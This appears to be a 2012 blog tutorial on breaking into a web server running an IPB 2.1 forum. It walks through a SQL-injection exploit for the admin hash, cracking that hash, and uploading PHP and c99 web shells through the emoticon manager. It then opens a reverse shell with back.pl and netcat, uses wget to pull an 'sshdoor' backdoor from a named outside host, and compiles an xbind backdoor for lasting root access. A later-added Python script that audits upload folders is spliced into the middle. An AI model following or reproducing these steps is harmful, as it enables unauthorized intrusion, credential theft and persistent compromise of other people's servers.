Thursday 7 June 2012

Rooting Tutorial! (Exploiting and Rooting a Webserver from Scratch) Complete Tutorial
Intro:

For today's tutorial we shall learn how to exploit and root a webserver, also gaining future access. The tutorial is most likely to be divided into three parts.

1) Gaining Admin Access.
2) Uploading The Shell
3) Using the Shell to Gain Root Access

Hacking a Forum Admin using Exploit to Gain Admin Access - Part 1:

As said earlier, I'm going to exploit an IPB v2.1 forum here. You can hack other forums too using exploits or making your own exploits (which is rare).

Tools Needed:

This has the shell and backdoor files along with MD5 HashCracking tool and
some other things.

Download:
Code:
http://depositfiles.com/files/9juskrtax

Gaining Admin Access:

For today I will be hacking an IPB 2.1 forum by gaining admin access, and then I will show you how to root the server.
First I will be using a Perl exploit to gain admin access to the forum. Usually the admin id is 1, maybe 0 or 2 sometimes.

Here it is this guy:

UserName: Kawool
UserId = 2

Next we extract the user hash and salt. Switch to cmd and execute the perl
exploit.

Then you should see this sql injection tool.
Change the forum index path, userid (of the admin), the table name.

After you click get data from database you should see this hash:
Then use converage pass salt option.

After you get the hash, the next step is to crack the salted hash. Since it is IPB, cracking the hash will be a pain for sure.

Cracking the Hash:

I have provided passwords pro in the download above. It is a very efficient
tool to crack md5 hashes, even salted ones.

Now probably go to sleep or drink 4-5 cups of tea until the hash is cracked.

I got mine after some time.

So now:

Code:
Username: Kawool

Password: *******
I'm gonna log in as admin now ^^; Let's move on to the main part of gaining root access.

Uploading The Shell as Admin - Part 2:

Uploading a Shell:

Now that we have admin access in our hands, this is the part where we upload a shell. (For those who don't know what a shell is, it is a PHP script that gives privileges to upload files on a website, mess with other files etc. And yeah, it allows gaining root access too.)

Uploading shell as smiley here.

In the ACP Go to Look and Feel -> Emoticon Manager -> Upload the shell file as smiley.


Now let's browse our shell, shall we..

w00t we has the shell uploaded properly. Next upload a c99 shell from this shell. Why we did this is because c99 shells can be detected sometimes. So the other shell is like a decoy.

Once it's done we upload the c99 shell.

Good shell was uploaded properly.

That does it for our 2nd part. Move on to Third.
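
The upload in Part 2 succeeds because the emoticon manager stores whatever file it is given inside a web-served directory. As an added example (not part of the original post), this Python check audits such an image-upload directory and flags files that are not plain images; the extension list, script markers and sample files are constructed assumptions.

```python
import tempfile
from pathlib import Path

# Magic-byte prefixes of the image types an emoticon directory should hold.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}
# Byte sequences treated as server-side script content (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<?=")


def audit_upload_dir(root):
    """Return {relative_path: [reasons]} for files that are not plain images."""
    findings = {}
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        data = path.read_bytes()
        reasons = []
        # Check every suffix: "x.php.gif" may still be handled as PHP.
        suffixes = [s.lower() for s in path.suffixes]
        if not suffixes or any(s not in IMAGE_MAGIC for s in suffixes):
            reasons.append("non-image extension")
        magic = IMAGE_MAGIC.get(suffixes[-1], ()) if suffixes else ()
        if not data.startswith(magic):
            reasons.append("magic bytes do not match extension")
        if any(marker in data.lower() for marker in SCRIPT_MARKERS):
            reasons.append("embedded script tag")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    """Audit a constructed emoticon directory (sample files are made up)."""
    samples = {
        "smile.gif": b"GIF89a\x01\x00\x01\x00",
        "grin.php": b"<?php echo 1; ?>",
        "wink.gif": b"GIF89a<?php echo 1; ?>",
        "sad.php.gif": b"GIF89a\x01\x00",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            Path(root, name).write_bytes(body)
        return audit_upload_dir(root)


if __name__ == "__main__":
    print(demo())
```

Any file flagged in a directory that should hold only images is worth investigating, and serving that directory with script execution disabled removes the impact of a file that slips through.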

Using the Shell to Gain Root Access - Part 3:

Now that we have all the shit ready for rooting lets upload a backconnect script. There are many and if one doesn't work usually the other does.

So I upload the back.pl I provided in the file.

After that's done, it's time to use the script.

For this we give the following code.

Code:
perl back.pl youripaddress

BEFORE we execute the script we need to start netcat and start listening for connections on port 2121.

Use netcat from my download file, and use the command:

Code:
nc -vv -l -p 2121

Next we shall upload an exploit that will let us obtain root status on the server.

Time to execute it.

Now we upload a backdoor for future access.

Type in the following command:
Code:
wget www.revitalizemessage.com/xpl/sshdoor.tgz (or whatever ur link is)
Now the following command:
Code:
tar -zxvf sshdoor.tgz
Then we make sshdoor the current directory using this code:
Code:
cd sshdoor
Then:
Code:
cat README
After you see the window with the sang and prabu names, execute the command:
Code:
.install yourpassword 2121
After that's done, we connect to the server via PuTTY.

Err, an Epic Fail has occurred my friends.

Maybe the host blocked the port, nmap scan revealed it. Oh well we upload another backdoor quickly. You don't always win (actually hackers do O_O).

Now we upload xbind.c this should be over quickly. Remember the steps don't you?

Indeed its easy.

Compile the xbind.c using gcc compiler. (be sure to type cd.. and be in the correct directory to work with the script):
Code:
gcc -o xbind xbind.c
Compile, run and connect.

Paste the following code now:
Code:
./xbind 1985
Switch to netcat again and run the connection code (nc vv blah blah blah) to the IP.

Now enter the password and get going.

Code:
uname -a
There you go, we now have future access to the server

That does it for our Rooting Server tutorial. Yeah I agree, gaining root access is a pain but it's worth the reward.
